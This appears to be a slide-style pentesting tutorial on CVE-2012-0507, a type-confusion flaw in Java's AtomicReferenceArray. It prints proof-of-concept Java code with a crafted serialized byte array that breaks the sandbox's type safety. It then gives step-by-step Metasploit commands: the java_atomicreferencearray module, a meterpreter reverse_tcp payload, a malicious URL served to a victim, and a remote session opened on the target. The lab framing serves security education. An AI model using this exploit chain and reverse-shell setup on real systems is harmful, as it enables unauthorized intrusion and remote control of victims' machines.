CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

1. PenTesting Tutorials:
www.BreakTheSecurity.com

3. About CVE-2012-0507
 A vulnerability in the JRE due to the fact that The
AtomicReferenceArray class implementation did
not properly check if the array is of an expected
Object[] type. The vulnerability found by Jeroen
Frijters
 A malicious Java application or applet could use
this flaw to cause Java Virtual Machine(JVM) to
crash or bypass Java sandbox restrictions.

4. public AtomicReferenceArray(E[] array) {
this.array = array.clone();
}

5. import java.util.concurrent.atomic.*;
class first
{
}
public violateClass
{
public static void main(String a[])
{
Object obj=new first();
AtomicReferenceArray r=new AtomicReferenceArray(new
first[1]);
obj="Hell";
r.set(0,obj);
first f=(first)r.get(0);
}
}

6. Exploiting
By manually constructing a serialized
object graph you can stick any array you
want into an AtomicReferenceArray
instance and then use the
AtomicReferenceArray.set() method to
write an arbitrary reference to violate type
safety.

7. Arbitrary reference to violate
type safety.
import java.io.*;
import java.util.concurrent.atomic.*;
class Union1 { }
class Union2 { }
public class test
{
static byte[] buf = new byte[] {
-84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103,
46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0,
0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59,
-2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112, 115,
114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117,
114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109,
105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87,
-46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97, 114, 114, 97, 121, 116,
0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101,
99, 116, 59, 120, 112, 113, 0, 126, 0, 3
};
public static void main(String[] args) throws Throwable
{
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf));
Object[] arr = (Object[])ois.readObject();
Union1[] u1 = (Union1[])arr[0];
AtomicReferenceArray ara = (AtomicReferenceArray)arr[1];
ara.set(0, new Union2());
System.out.println(u1[0]);
}
}

9. Requirements:
 VirtualBox
 Target OS(windows,...)
 PenTesting Distro(Backtrack )
 JRE 6(unpatched version)

10. Preparing Target Machine
 Start the "Target" Machine.
 Install the JRE 6.(I have already
installed the JRE)

11. Preparing Attacker Machine
 Now, start the BT5.
 Open the Terminal and Type
"msfupdate". This will update the Metasploit
Framework(MSF) with the latest exploits.

12.  Open the Terminal and type msfconsole
 Now type :
use exploit/multi/browser/java_atomicreferencearray
 The above command will use the
java_atomicreferencearray.rb module for the attack.

13.  Now type "show options" to display the
settings available and/or required for this
specific module.

14.  set SRVPORT 80
 set URIPATH /
 set SRVHOST [Backtrack_ip]
How to get IP of Backtrack:
○ open the Terminal
○ Type ifconfig
○ It will display the IP

15. Payload
 Type "show payloads“ . This will displays the
list of payloads available to use
 I am going to use the reverse_tcp payload.
This payload will get reverse tcp connection
from the Target to our machine.
 Type set payload java/meterpreter/reverse_tcp

16.  In order to get reverse connection, we
have to set Backtrack IP in the LHOST.
 So type the following command:
set LHOST [Backtrack_IP]

17. Are you ready?! Let us

18.  We have setup everything needed for the
Exploit. So it is time to break into the Target
machine.
 Type "exploit" in the msfconsole.

19.  This will start the reverse handler to our
Machine and it will wait anyone that will
connect to the our HTTP server (Eg:
http://192.168.56.102)
 Once victim connect to our server, it will send
a jar will that will exploit the CVE-2012-0507
vulnerability.

20. Victim side
 We have set up our exploit. Let us see what
happen when our victim open our url.
 Go to the “Target” VM.
 Open the Firefox
 Enter the url you got from the you got from the
metasploit exploit:
Eg: http://192.168.56.102
 No need to care about the „80‟ in the URL becoz
It is default port 

21.  It loads nothing
but in background :
 The Backtrack sends a jar file and
exploit the vulnerability.
 After successful exploit, it brings control
to Backtrack 

22.  Now type "sessions“ in the metasploit
console, this will display the list of
active sessions(victims list)

23.  Type "sessions -i 1", this will open the
connection to the session with the id '1' and
bring you to Meterpreter
 Meterpreter will help you to interact/control with
the Target

24. Exploited in the Wild
 On April 2012, The research conducted by
Dr.Web determined that more than 600,000
Mac computers are infected with
BackDoor.Flashback botnet.
 Included in Exploit kits

25.  I hope this article has given you a good
insight into how to use MetaSploit Framework
to exploit the Java vulnerability.
 I hope this will help you to get into the
PenTesting world..!
 For more PenTesting Tutorials :
www.BreakTheSecurity.com